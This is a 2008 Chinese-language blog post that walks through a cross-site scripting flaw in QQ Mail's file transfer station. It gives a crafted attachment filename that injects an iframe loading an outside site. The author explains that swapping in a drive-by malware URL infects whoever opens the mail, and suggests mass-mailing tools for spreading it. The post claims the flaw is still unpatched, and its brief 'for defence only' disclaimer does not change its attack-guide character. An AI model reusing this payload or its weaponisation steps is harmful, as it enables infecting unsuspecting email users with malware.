posts - 227,  comments - 71,  trackbacks - 0
09月10日QQ邮箱跨站漏洞
QQ邮箱跨站漏洞就是针对文件中转站
首先,打开我的QQ邮箱,用我自己的做测试...


如图一所示,打开我的QQ邮箱后,找到这个 文件中转站(1) 


如图二所示,
点...开始上传,,,,

这个地方写..

这是我们今天要利用的代码;
利用代码:【构造附件】
F:\pigerzhu<iframe src=http://http://www.hxhack.com%20width=800%20height=800/><%2Fiframe>XXS.rar

以上利用代码中的网址http://www.hxhack.com/可以换成你想要的网址,也可以替换成网马地址,这样对方一打开邮件,就会自动打开网马地址。
要是这个里面打开的网址被挂马?对方中马了都不知道吧。

其中的网址可以让你自由发挥,万一把里面的网址换成你的网马地址,再发给别人点击,对方就叫中马了。


如图三所示:
下面怎么办呢?

可以利用群发工具,,进行传播..我就不演示了,,我给自己发一份,,大家看下效果就可以了.


好,我们到收件箱看下..
呵呵,大家可以看到,我们的网站已经弹出来了...是的,就是这样...



大家千万不要利用来恶意搞破坏,发出来只是让大家更好的防护,而不是去搞破坏。

截止此文章发布的时候,漏洞依然存在,腾讯还没有补上这个漏洞。
posted on 2008-09-12 10:14 %5C 阅读(...) 评论(...) 编辑 收藏